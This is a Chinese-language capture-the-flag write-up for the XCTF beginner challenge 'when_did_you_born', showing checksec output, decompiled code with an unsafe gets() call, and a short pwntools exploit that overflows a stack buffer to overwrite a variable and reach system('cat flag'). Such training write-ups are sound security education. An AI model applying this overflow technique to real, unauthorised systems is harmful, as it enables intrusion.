【攻防世界】:新手區 | when_did_you_born
阿新 • • 發佈:2020-08-01
checksec檢視程式型別: 有Canary,先看看程式邏輯
[*] '/home/zowie/Downloads/when_did_you_born' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000)
放入IDA反編譯看虛擬碼尋找漏洞:
__int64 __fastcall main(__int64 a1, char **a2, char **a3) { __int64 result;// rax char v4; // [rsp+0h] [rbp-20h] unsigned int v5; // [rsp+8h] [rbp-18h] unsigned __int64 v6; // [rsp+18h] [rbp-8h]
v6 = __readfsqword(0x28u); setbuf(stdin, 0LL); setbuf(stdout, 0LL); setbuf(stderr, 0LL); puts("What's Your Birth?"); __isoc99_scanf("%d", &v5); while ( getchar() != 10 ) ;if ( v5 == 1926 ) { puts("You Cannot Born In 1926!"); result = 0LL; } else { puts("What's Your Name?"); gets(&v4); printf("You Are Born In %d\n", v5); if ( v5 == 1926 ) { puts("You Shall Have Flag."); system("cat flag"); } else { puts("You Are Naive."); puts("You Speed One Second Here."); } result = 0LL; } return result; }
程式中已經有現成的 system("cat flag"); 我們需要輸入不為1926的出生年份進入else中,再通過對v4的溢位覆蓋v5的值為1926
故exp:
from pwn import * #io = process("./when_did_you_born")
io = remote("IPaddr",port) io.sendlineafter('th?','1234') payload = b'a' * 8 + p64(1926) io.sendlineafter('me?',payload)